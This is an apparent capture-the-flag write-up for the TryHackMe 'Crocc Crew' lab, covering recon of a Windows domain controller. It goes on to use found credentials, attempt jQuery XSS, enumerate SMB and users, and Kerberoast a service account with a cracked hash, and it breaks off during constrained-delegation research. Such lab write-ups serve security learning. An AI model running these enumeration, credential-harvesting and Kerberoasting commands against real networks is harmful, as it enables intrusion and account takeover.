Crocc Crew

Crocc Crew Recon to Foothold Let’s being as always with a scan, first masscan rob:TryHackMe/ $ sudo masscan -p1-65535,U:1-65535 10.10.45.72 --rate=1000 -e tun0 [sudo] password for rob: Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-18 12:24:43 GMT Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 445/tcp on 10.10.45.72 Discovered open port 593/tcp on 10.10.45.72 Discovered open port 9389/tcp on 10.10.45.72 Discovered open port 464/tcp on 10.10.45.72 Discovered open port 49678/tcp on 10.10.45.72 Discovered open port 49669/tcp on 10.10.45.72 Discovered open port 49675/tcp on 10.10.45.72 Discovered open port 49711/tcp on 10.10.45.72 Discovered open port 636/tcp on 10.10.45.72 Discovered open port 49666/tcp on 10.10.45.72 Discovered open port 389/tcp on 10.10.45.72 Discovered open port 53/tcp on 10.10.45.72 Discovered open port 49674/tcp on 10.10.45.72 Discovered open port 3269/tcp on 10.10.45.72 Discovered open port 80/tcp on 10.10.45.72 Discovered open port 135/tcp on 10.10.45.72 Discovered open port 139/tcp on 10.10.45.72 Discovered open port 88/tcp on 10.10.45.72 Discovered open port 53/udp on 10.10.45.72 Discovered open port 3268/tcp on 10.10.45.72 Discovered open port 3389/tcp on 10.10.45.72 Ok, given the number and type of ports discovered this looks like a Windows machine. No UDP ports discovered apart from DNS (53) so for now at least we can ignore that And now nmap for detail rob:TryHackMe/ $ nmap -A -T4 -v -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,9389 10.10.45.72 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 13:36 BST NSE: Loaded 153 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 13:36 Completed NSE at 13:36, 0.00s elapsed Initiating NSE at 13:36 Completed NSE at 13:36, 0.00s elapsed Initiating NSE at 13:36 Completed NSE at 13:36, 0.00s elapsed Initiating Ping Scan at 13:36 Scanning 10.10.45.72 [2 ports] Completed Ping Scan at 13:36, 0.01s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 13:36 Completed Parallel DNS resolution of 1 host. at 13:36, 0.04s elapsed Initiating Connect Scan at 13:36 Scanning 10.10.45.72 [14 ports] Discovered open port 135/tcp on 10.10.45.72 Discovered open port 80/tcp on 10.10.45.72 Discovered open port 139/tcp on 10.10.45.72 Discovered open port 53/tcp on 10.10.45.72 Discovered open port 3389/tcp on 10.10.45.72 Discovered open port 445/tcp on 10.10.45.72 Discovered open port 389/tcp on 10.10.45.72 Discovered open port 464/tcp on 10.10.45.72 Discovered open port 9389/tcp on 10.10.45.72 Discovered open port 3269/tcp on 10.10.45.72 Discovered open port 88/tcp on 10.10.45.72 Discovered open port 636/tcp on 10.10.45.72 Discovered open port 593/tcp on 10.10.45.72 Discovered open port 3268/tcp on 10.10.45.72 Completed Connect Scan at 13:36, 0.02s elapsed (14 total ports) Initiating Service scan at 13:36 Scanning 14 services on 10.10.45.72 Completed Service scan at 13:36, 6.64s elapsed (14 services on 1 host) NSE: Script scanning 10.10.45.72. Initiating NSE at 13:36 Completed NSE at 13:36, 40.09s elapsed Initiating NSE at 13:36 Completed NSE at 13:36, 0.39s elapsed Initiating NSE at 13:36 Completed NSE at 13:36, 0.00s elapsed Nmap scan report for 10.10.45.72 Host is up (0.012s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-18 12:36:19Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: COOCTUS.CORP0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: COOCTUS.CORP0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: COOCTUS | NetBIOS_Domain_Name: COOCTUS | NetBIOS_Computer_Name: DC | DNS_Domain_Name: COOCTUS.CORP | DNS_Computer_Name: DC.COOCTUS.CORP | Product_Version: 10.0.17763 |_ System_Time: 2021-08-18T12:36:20+00:00 | ssl-cert: Subject: commonName=DC.COOCTUS.CORP | Issuer: commonName=DC.COOCTUS.CORP | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-06-07T02:37:18 | Not valid after: 2021-12-07T02:37:18 | MD5: 72be 3896 d880 1bc2 2455 1d55 33da 9300 |_SHA-1: bb1b c5bc 3aef ede9 3dc2 8b0d 0b00 c1d3 4371 19f4 |_ssl-date: 2021-08-18T12:37:00+00:00; +1s from scanner time. 9389/tcp open mc-nmf .NET Message Framing Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-08-18T12:36:25 |_ start_date: N/A NSE: Script Post-scanning. Initiating NSE at 13:36 Completed NSE at 13:36, 0.00s elapsed Initiating NSE at 13:36 Completed NSE at 13:36, 0.00s elapsed Initiating NSE at 13:36 Completed NSE at 13:36, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 47.75 seconds Before we dig into the website and more complex ports let’s have a look at some of the simpler stuff, starting with SMB rob:TryHackMe/ $ smbclient -L 10.10.45.72 -U "" -N Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available Ok then, it looks like we’ll require some creds before that is of any potential use From our nmap scan we found a domain name cooctus.corp, let’s see if we can query DNS rob:TryHackMe/ $ dig any cooctus.corp @10.10.45.72 ; DiG 9.16.15-Debian any cooctus.corp @10.10.45.72 ;; global options: +cmd ;; Got answer: ;; -HEADERNothing particularly useful there, let’s try LDAP rob:TryHackMe/ $ ldapsearch -x -h 10.10.45.72 -D '' -b "DC=,DC=" # extended LDIF # # LDAPv3 # base ,DC= with scope subtree # filter: (objectclass=*) # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v4563 No, this is looking for credentials too! Let’s try another way rob:CroccCrew/ $ ldapsearch -LLL -x -H ldap://dc.cooctus.corp -b '' -s base '(objectclass=*)' dn: domainFunctionality: 7 forestFunctionality: 7 domainControllerFunctionality: 7 rootDomainNamingContext: DC=COOCTUS,DC=CORP ldapServiceName: COOCTUS.CORP:dc$@COOCTUS.CORP isGlobalCatalogReady: TRUE supportedSASLMechanisms: GSSAPI supportedSASLMechanisms: GSS-SPNEGO supportedSASLMechanisms: EXTERNAL supportedSASLMechanisms: DIGEST-MD5 supportedLDAPVersion: 3 supportedLDAPVersion: 2 supportedLDAPPolicies: MaxPoolThreads supportedLDAPPolicies: MaxPercentDirSyncRequests supportedLDAPPolicies: MaxDatagramRecv supportedLDAPPolicies: MaxReceiveBuffer supportedLDAPPolicies: InitRecvTimeout supportedLDAPPolicies: MaxConnections supportedLDAPPolicies: MaxConnIdleTime supportedLDAPPolicies: MaxPageSize supportedLDAPPolicies: MaxBatchReturnMessages supportedLDAPPolicies: MaxQueryDuration supportedLDAPPolicies: MaxDirSyncDuration supportedLDAPPolicies: MaxTempTableSize supportedLDAPPolicies: MaxResultSetSize supportedLDAPPolicies: MinResultSets supportedLDAPPolicies: MaxResultSetsPerConn supportedLDAPPolicies: MaxNotificationPerConn supportedLDAPPolicies: MaxValRange supportedLDAPPolicies: MaxValRangeTransitive supportedLDAPPolicies: ThreadMemoryLimit supportedLDAPPolicies: SystemMemoryLimitPercent supportedControl: 1.2.840.113556.1.4.319 supportedControl: 1.2.840.113556.1.4.801 supportedControl: 1.2.840.113556.1.4.473 supportedControl: 1.2.840.113556.1.4.528 supportedControl: 1.2.840.113556.1.4.417 supportedControl: 1.2.840.113556.1.4.619 supportedControl: 1.2.840.113556.1.4.841 supportedControl: 1.2.840.113556.1.4.529 supportedControl: 1.2.840.113556.1.4.805 supportedControl: 1.2.840.113556.1.4.521 supportedControl: 1.2.840.113556.1.4.970 supportedControl: 1.2.840.113556.1.4.1338 supportedControl: 1.2.840.113556.1.4.474 supportedControl: 1.2.840.113556.1.4.1339 supportedControl: 1.2.840.113556.1.4.1340 supportedControl: 1.2.840.113556.1.4.1413 supportedControl: 2.16.840.1.113730.3.4.9 supportedControl: 2.16.840.1.113730.3.4.10 supportedControl: 1.2.840.113556.1.4.1504 supportedControl: 1.2.840.113556.1.4.1852 supportedControl: 1.2.840.113556.1.4.802 supportedControl: 1.2.840.113556.1.4.1907 supportedControl: 1.2.840.113556.1.4.1948 supportedControl: 1.2.840.113556.1.4.1974 supportedControl: 1.2.840.113556.1.4.1341 supportedControl: 1.2.840.113556.1.4.2026 supportedControl: 1.2.840.113556.1.4.2064 supportedControl: 1.2.840.113556.1.4.2065 supportedControl: 1.2.840.113556.1.4.2066 supportedControl: 1.2.840.113556.1.4.2090 supportedControl: 1.2.840.113556.1.4.2205 supportedControl: 1.2.840.113556.1.4.2204 supportedControl: 1.2.840.113556.1.4.2206 supportedControl: 1.2.840.113556.1.4.2211 supportedControl: 1.2.840.113556.1.4.2239 supportedControl: 1.2.840.113556.1.4.2255 supportedControl: 1.2.840.113556.1.4.2256 supportedControl: 1.2.840.113556.1.4.2309 supportedControl: 1.2.840.113556.1.4.2330 supportedControl: 1.2.840.113556.1.4.2354 supportedCapabilities: 1.2.840.113556.1.4.800 supportedCapabilities: 1.2.840.113556.1.4.1670 supportedCapabilities: 1.2.840.113556.1.4.1791 supportedCapabilities: 1.2.840.113556.1.4.1935 supportedCapabilities: 1.2.840.113556.1.4.2080 supportedCapabilities: 1.2.840.113556.1.4.2237 subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat ion,DC=COOCTUS,DC=CORP schemaNamingContext: CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP namingContexts: DC=COOCTUS,DC=CORP namingContexts: CN=Configuration,DC=COOCTUS,DC=CORP namingContexts: CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP namingContexts: DC=DomainDnsZones,DC=COOCTUS,DC=CORP namingContexts: DC=ForestDnsZones,DC=COOCTUS,DC=CORP isSynchronized: TRUE highestCommittedUSN: 98342 dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN =Sites,CN=Configuration,DC=COOCTUS,DC=CORP dnsHostName: DC.COOCTUS.CORP defaultNamingContext: DC=COOCTUS,DC=CORP currentTime: 20210823235515.0Z configurationNamingContext: CN=Configuration,DC=COOCTUS,DC=CORP Ok, at a first glance there is nothing useful there for us. Some goolging though find us a new (to me at least) tool that looks very handy, ldapdomaindump rob:CroccCrew/ $ ldapdomaindump -u 'Visitor' -p 'GuestLogin!' 10.10.145.144 [!] Username must include a domain, use: DOMAIN\username rob:CroccCrew/ $ ldapdomaindump -u 'COOCTUS.CORP\Visitor' -p 'GuestLogin!' 10.10.145.144 [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished This drops a number of files detailing computers, groups, policies, trusts, etc. An interesting one for us is the user table There’s a lot of info here and nothing jumps out at me right now, it’s very readable though, must remember this one! Trying to enumerate RPC gives us nothing without authentication either rob:TryHackMe/ $ rpcinfo -p 10.10.45.72 10.10.45.72: RPC: Remote system error - Connection refused And the same with rpcclient rob:CroccCrew/ $ rpcclient -U "" -N dc.cooctus.corp rpcclient $ querydispinfo result was NT_STATUS_ACCESS_DENIED If we try hunting through the commands available we do find one that returns an output rob:~/ $ rpcclient -U "" -N 10.10.245.246 rpcclient $ enumprivs found 35 privileges SeCreateTokenPrivilege 0:2 (0x0:0x2) SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3) SeLockMemoryPrivilege 0:4 (0x0:0x4) SeIncreaseQuotaPrivilege 0:5 (0x0:0x5) SeMachineAccountPrivilege 0:6 (0x0:0x6) SeTcbPrivilege 0:7 (0x0:0x7) SeSecurityPrivilege 0:8 (0x0:0x8) SeTakeOwnershipPrivilege 0:9 (0x0:0x9) SeLoadDriverPrivilege 0:10 (0x0:0xa) SeSystemProfilePrivilege 0:11 (0x0:0xb) SeSystemtimePrivilege 0:12 (0x0:0xc) SeProfileSingleProcessPrivilege 0:13 (0x0:0xd) SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe) SeCreatePagefilePrivilege 0:15 (0x0:0xf) SeCreatePermanentPrivilege 0:16 (0x0:0x10) SeBackupPrivilege 0:17 (0x0:0x11) SeRestorePrivilege 0:18 (0x0:0x12) SeShutdownPrivilege 0:19 (0x0:0x13) SeDebugPrivilege 0:20 (0x0:0x14) SeAuditPrivilege 0:21 (0x0:0x15) SeSystemEnvironmentPrivilege 0:22 (0x0:0x16) SeChangeNotifyPrivilege 0:23 (0x0:0x17) SeRemoteShutdownPrivilege 0:24 (0x0:0x18) SeUndockPrivilege 0:25 (0x0:0x19) SeSyncAgentPrivilege 0:26 (0x0:0x1a) SeEnableDelegationPrivilege 0:27 (0x0:0x1b) SeManageVolumePrivilege 0:28 (0x0:0x1c) SeImpersonatePrivilege 0:29 (0x0:0x1d) SeCreateGlobalPrivilege 0:30 (0x0:0x1e) SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f) SeRelabelPrivilege 0:32 (0x0:0x20) SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21) SeTimeZonePrivilege 0:34 (0x0:0x22) SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23) SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24) So this would suggest that whatever service account is running the RPC service has interesting privileges like SEImpersonatePrivilege. If we can get in as this account we may be able to escalate our privileges from there. That’s a big IF though! 😄 Let’s check out the web server on port 80 next Ok, looking at the source shows us that this is a page made on webflow.io, there’s nothing site specific here. Let’s see if we can enumerate the web server then with a directory buster rob:~/ $ gobuster dir --url http://10.10.245.246 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php,asp,txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.245.246 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: html,php,asp,txt [+] Timeout: 10s =============================================================== 2021/09/23 18:52:06 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 5342323] /robots.txt (Status: 200) [Size: 70] /Index.html (Status: 200) [Size: 5342323] /backdoor.php (Status: 200) [Size: 529] /Robots.txt (Status: 200) [Size: 70] /index.html (Status: 200) [Size: 5342323] =============================================================== 2021/09/23 18:58:27 Finished =============================================================== We found a robots.txt file that nmap didn’t show, let’s have a look at that rob:CroccCrew/ $ curl dc.cooctus.corp/robots.txt User-Agent: * Disallow: /robots.txt /db-config.bak /backdoor.php Alright then, well there’s a couple of interesting files shown there, a backup of the database config perhaps and what could be a backdoor of some type, let’s look a little closer at these rob:CroccCrew/ $ curl dc.cooctus.corp/db-config.bak connect_error) { die ("Connection Failed: " .$conn-connect_error); } echo "Connected Successfully"; ?% Excellent, we appear to have found some credentials, C00ctusAdm1n:B4dt0th3b0n3 to a mysql database. Even if we can’t access that from outside the box, we may find some credential reuse elsewhere. Speaking of which, we have an open RDP port, let’s see if it works there And no, nothing doing. Let’s check the other file rob:CroccCrew/ $ curl dc.cooctus.corp/backdoor.php $('body').terminal({ hello: function(what) { this.echo('Hello, ' + what + '. Wellcome to this terminal.'); } }, { greetings: 'CroccCrew :)' }); Well, that does indeed look like a potential way in, let’s check it out in a browser It takes a little trial and error and looking at the curl output above, but we manage to get a response from this hello function. This appears to be taking arbitrary input from the user and returning it (possibly unsanitized) in the response We can mess with this a bit to see if we get any interesting responses hello [Arity] Wrong number of arguments. Function 'hello' expects 1 got 0! Hello hello Command 'Hello' Not Found! hello hello\';echo('here's something fun')# Error: JSON.parse: unterminated string at line 1 column 9 of the JSON data Ok that’s interesting, we have a JSON parser here. Not sure what we can make of it though! 😄 …and that is apparently nothing jQuery Terminal Emulator is a plugin for creating command line interpreters in your applications. It can automatically call JSON-RPC service when a user types commands or you can provide your own function in which you can parse user commands Some checking of the downloaded javascript files shows We are using jquery.terminal version 2.29.0 which was the very latest up until about 11 hours ago and has no known vulnerabilities according to the usual sources (cve.mitre.org, etc.) But we are using jquery-3.3.1.min.js which does have some known issues. This version was released 2018/1/20 (from the release history) and is a couple of major updates behind the current 3.6.0 Most interesting for us though is the 3.5.0 release for which the release notes read Despite being a minor release, this update includes a breaking change that we had to make to fix a security issue ( CVE-2020-11022) If we check out this CVE we find something that sounds pretty useful in our situation In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery’s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code Some googling finds that this CVE is one of a pair, we also have CVE-2020-11023 For CVE-2020-11022 we find a possible exploit in the exploit-db And for CVE-2020-11023 we find some more However when we try these we run into that argument number checker we saw earlier, the spaces are our enemies! hello [Arity] Wrong number of arguments. Function 'hello' expects 1 got 3! And if we try to replace spaces with + or %20 we don’t get any further hello Hello, . Wellcome to this terminal. hello Hello, . Wellcome to this terminal. But on a second thought, since those methods are typically good for URL encoding, perhaps we’d be better off trying to use hello ^ However finishing this with a ; converts automagically back to a space! hello We seem to get a litle progress (maybe… at least a different response!) with escaping the spaces hello hello Hello, . Wellcome to this terminal. hello Hello, . Wellcome to this terminal. hello " Error: JSON.parse: bad escaped character at line 1 column 7 of the JSON data So we can see that in at least the first two POCs the string is being accepted, but it appears that it is not being interpreted, simply returned Looking a little closer at the first (or second) output though we can see something odd hello Hello, . Wellcome to this terminal. For the space after src=x the backslash is gone and the space renders correctly. However for the space after img we can still see the backslash At this point we’re grinding to a halt with this approach, let’s see if we can find another avenue of attack On a hint from discord that remmina is not the best RDP client to use, let’s see what we get if we use an alternative, rdesktop Ok, that does make a difference. Some googling suggests that your RDP client must be old enough to not support network level authentication (i. e. from WinXP or before) or you have to connect via a .rdp file that contains the option enablecredsspsupport:i:0 We’re not using a .rdp file, so I guess it is really old! We find another possible set of user credentials we can try, Visitor:GuestLogin!, but they won’t work for RDP Let’s try them elsewhere then rob:~/ $ smbclient -L 10.10.245.246 -U 'Visitor' Enter WORKGROUP\Visitor's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Home Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available Excellent, we can access an SMB share with these credentials, let’s see what’s in there rob:~/ $ smbclient //10.10.245.246/Home -U 'Visitor' Enter WORKGROUP\Visitor's password: Try "help" to get a list of possible commands. smb: \ ls . D 0 Tue Jun 8 20:42:53 2021 .. D 0 Tue Jun 8 20:42:53 2021 user.txt A 17 Tue Jun 8 04:14:25 2021 15587583 blocks of size 4096. 11417631 blocks available smb: \ get user.txt getting file \user.txt of size 17 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) smb: \ !cat user.txt THM{REDACTED} And we’ve got our first flag, #1: THM{REDACTED} C00ctusAdm1n:B4dt0th3b0n3 NB: we could also have used crackmapexec to test these credentials rob:CroccCrew/ $ crackmapexec smb 10.10.145.144 -u ‘Visitor’ -p ‘GuestLogin!’ SMB 10.10.145.144 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:COOCTUS.CORP) (signing:True) (SMBv1:False) SMB 10.10.145.144 445 DC [+] COOCTUS.CORP\Visitor:GuestLogin! From first creds to privileged RCE So now, with a set of working SMB credentials, we have a few more options. We want to find usernames so let’s first try enum4linux rob:~/ $ enum4linux -u 'Visitor' -p 'GuestLogin!' -U 10.10.245.246 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 23 19:18:14 2021 ========================== | Target Information | ========================== Target ........... 10.10.245.246 RID Range ........ 500-550,1000-1050 Username ......... 'Visitor' Password ......... 'GuestLogin!' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ===================================================== | Enumerating Workgroup/Domain on 10.10.245.246 | ===================================================== [E] Can't find workgroup/domain ====================================== | Session Check on 10.10.245.246 | ====================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [+] Server 10.10.245.246 allows sessions using username 'Visitor', password 'GuestLogin!' Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name: ============================================ | Getting domain SID for 10.10.245.246 | ============================================ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: COOCTUS Domain Sid: S-1-5-21-2062199590-3607821280-2073525473 [+] Host is part of a domain (not a workgroup) ============================== | Users on 10.10.245.246 | ============================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. index: 0xfda RID: 0x461 acb: 0x00000210 Account: admCroccCrew Name: admCroccCrew Desc: (null) index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0xfe4 RID: 0x46b acb: 0x00000210 Account: Ben Name: Ben Desc: (null) index: 0xfdd RID: 0x464 acb: 0x00000210 Account: cryillic Name: cryillic Desc: (null) index: 0xfe5 RID: 0x46c acb: 0x00000210 Account: David Name: David Desc: (null) index: 0xfe3 RID: 0x46a acb: 0x00000210 Account: evan Name: evan Desc: (null) index: 0xfdb RID: 0x462 acb: 0x00000210 Account: Fawaz Name: Fawaz Desc: (null) index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0xfd9 RID: 0x460 acb: 0x00000210 Account: Howard Name: Howard Desc: (null) index: 0xfd5 RID: 0x45c acb: 0x00000210 Account: Jeff Name: Jeff Desc: (null) index: 0xfe1 RID: 0x468 acb: 0x00000210 Account: jon Name: jon Desc: (null) index: 0xfdc RID: 0x463 acb: 0x00000210 Account: karen Name: karen Desc: (null) index: 0xfe0 RID: 0x467 acb: 0x00000210 Account: kevin Name: kevin Desc: (null) index: 0xf0f RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account index: 0xfd4 RID: 0x45b acb: 0x00020010 Account: mark Name: Mark Desc: (null) index: 0xfdf RID: 0x466 acb: 0x00000210 Account: pars Name: paradox Desc: (null) index: 0xfe8 RID: 0x46e acb: 0x00040210 Account: password-reset Name: reset Desc: (null) index: 0xfd6 RID: 0x45d acb: 0x00000210 Account: Spooks Name: Spooks Desc: (null) index: 0xfd8 RID: 0x45f acb: 0x00000210 Account: Steve Name: Steve Desc: (null) index: 0xfe2 RID: 0x469 acb: 0x00000210 Account: Varg Name: varg Desc: (null) index: 0xfb8 RID: 0x455 acb: 0x00000210 Account: Visitor Name: Cooctus Guest Desc: (null) index: 0xfde RID: 0x465 acb: 0x00000210 Account: yumeko Name: yumeko Desc: (null) Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881. user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[Visitor] rid:[0x455] user:[mark] rid:[0x45b] user:[Jeff] rid:[0x45c] user:[Spooks] rid:[0x45d] user:[Steve] rid:[0x45f] user:[Howard] rid:[0x460] user:[admCroccCrew] rid:[0x461] user:[Fawaz] rid:[0x462] user:[karen] rid:[0x463] user:[cryillic] rid:[0x464] user:[yumeko] rid:[0x465] user:[pars] rid:[0x466] user:[kevin] rid:[0x467] user:[jon] rid:[0x468] user:[Varg] rid:[0x469] user:[evan] rid:[0x46a] user:[Ben] rid:[0x46b] user:[David] rid:[0x46c] user:[password-reset] rid:[0x46e] enum4linux complete on Thu Sep 23 19:18:25 2021 Of these found usernames the one most likely to be the planted account must be #2: admCroccCrew We can try psexec by impacket to see can we get a shell from here rob:CroccCrew/ $ impacket-psexec 'COOCTUS.CORP/Visitor:GuestLogin!'@10.10.145.144 -dc-ip 10.10.145.144 Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on 10.10.145.144..... [-] share 'ADMIN$' is not writable. [-] share 'C$' is not writable. [-] share 'Home' is not writable. [-] share 'NETLOGON' is not writable. [-] share 'SYSVOL' is not writable. Unfortunately we do not have a writable share that can be used, so no joy! Sticking with the impacket tools though, can we do more with this? Let’s try GetUserSPNs to see can we find a service account to abuse rob:CroccCrew/ $ impacket-GetUserSPNs 'COOCTUS.CORP/Visitor:GuestLogin!' -dc-ip 10.10.145.144 -request -outputfile TGS.txt Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- -------------- -------- -------------------------- -------------------------- ----------- HTTP/dc.cooctus.corp password-reset 2021-06-08 23:00:39.356663 2021-06-08 22:46:23.369540 constrained And we retrieved a hash too rob:CroccCrew/ $ cat TGS.txt $krb5tgs$23$*password-reset$COOCTUS.CORP$COOCTUS.CORP/password-reset*$4024001208a3bc13b06e873d2dac6a8f$86f409e6dab77f5c154ece6cb178804c7b10a6714c5845da94672d6e904d12bcc1584e101093546605253747facb2b21b335871415882868eeb18cd25f0132bad532c8f84ab9c934ef2fb52131ac71eac6d6198ee509f931e76424d76c3b23c55a9a7e7a8831e29f62789d84c40df2729897bfbf27f1b14ff0cbcf47c44506bf2132ebf988d4b0e0c0f75b72b3616bd3e3db9c4adacb3deabb35da2ca32565fc1a4e353bb195cbaa078e6ad0cc838e143a8ff300042c6270aa473e7b329973f39de7de7ea250f11daff2afcba77a2ef1a43499506f4a035d9edb985233d711738a852efa9bac6c589beca775923905e122e1b1fc9e4650316c376a43abc6a8197ca3abaf13cd95b5a0e420b1caf4ca30021145127c44ae4c1e352b505076e2e9a531ef761c5119de16983239a60f57b3f843e9b1869a9c892c6536ae6de07ee032002ba46a458b3dae5db5c6d1fe7af2bbdbb943ed87d7972b51b2452604e4bbf7d2abddab72a650b973a99e9f6db56d8540234bf1923976223b1997dffe4f3711e8267ca71989a01686a0134bdfb379d52b3ec3cfad48cdebc96085d4133a1dd3f85b7f01976e4542d2aeb22a21927fcbc6af7df22bab540cc8c4fa41389624334e7ad6f98a14dff4f53430b63beae9660ee9ec5a28563b300aade667efe1257bcea7bfdf4cc2017b678cb89fa34174481b96767bc2cd4a05756fa3ef43311cd642aed3fb87933d01685ee3965b211d4ea5e5c75e7dd0222a64b6f8714e8bc0abd7e7487acc80b96da5680100f4cecb720e4f3c4ca852499c3a4a2bf77587319a60c02b8c1947fdf43ade5360222d85903f5e648d28c474bf026ad9fe1bce39cd5d9dea767c31615048d0d1e08e538017d7d603cca398dfc0881c30384e3598ea42b2965e58cba8e616caab5db07417705f0fecca248695d5307470dd25bc1287069ea45bde51b3e71ece9f5d9c21dbf975753330816a53968cf744186b2c027d29883fa7ff05fe4dd47bd87ba93839d7ccd4a9a7ccd1cebb543e6d1ba9c0e939caa07962e66863eaf7ae6824e2d7d904d7c3ed9652fb3b5c1f9de03ef3057016b6bcb4d9945780a0ef7ea014f398aa1b5d8fc59c74f49d5b503995519b4fc824dba20b470f4412ae7a06f862b5b7c559047f28696ab08ed8e22bf6fea30e96d44f6c814bc24809ee020b74977c281e0b048d308ee217b3ae1c6931498b8ebe6b73d201da1d7b170dd67dd9c02e15c76100ff95dac4a97e122c219da2e8a90303fa80ded93bad2f4c7259e5e5936394bac2cb007d487bf056138c3336d0a297f2715f262159d6b51dd4d8fc7db199de56c8618818ba36857a9b16bc Let’s see if we can crack this now using john rob:CroccCrew/ $ john TGS.txt -w=/usr/share/wordlists/rockyou.txt --format=krb5tgs Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status resetpassword (?) 1g 0:00:00:00 DONE (2021-09-24 00:16) 5.000g/s 1187Kp/s 1187Kc/s 1187KC/s rikelme..nichel Use the "--show" option to display all of the cracked passwords reliably Session completed Excellent, we have new creds, password-reset:resetpassword What can we do with this though? Cue a lot of research as my AD attack knowlege is woefully lacking! Found a very good youtube video here Going back over our findings so far highlights something that looked interesting rob:CroccCrew/ $ impacket-GetUserSPNs 'COOCTUS.CORP/Visitor:GuestLogin!' -dc-ip 10.10.145.144 -request -outputfile TGS.txt Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- -------------- -------- -------------------------- -------------------------- ----------- HTTP/dc.cooctus.corp password-reset 2021-06-08 23:00:39.356663 2021-06-08 22:46:23.369540 constrained We can see a ‘constrained’ value in the ‘Delegation’ column This connects up with something we saw earlier in our LDAP enumeration The account password-reset had a flag that no other domain user had, TRUSTED_TO_AUTH_FOR_DELEGATION Some more googling finds a good article on this When constrained delegation is set on an account, two things happen under the covers: The userAccountControl attribute for the object gets updated with the “TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION” flag and all the pieces I would want to exploit constrained delegation: A compromised account configured with constrained delegation A target privileged account to impersonate when requesting 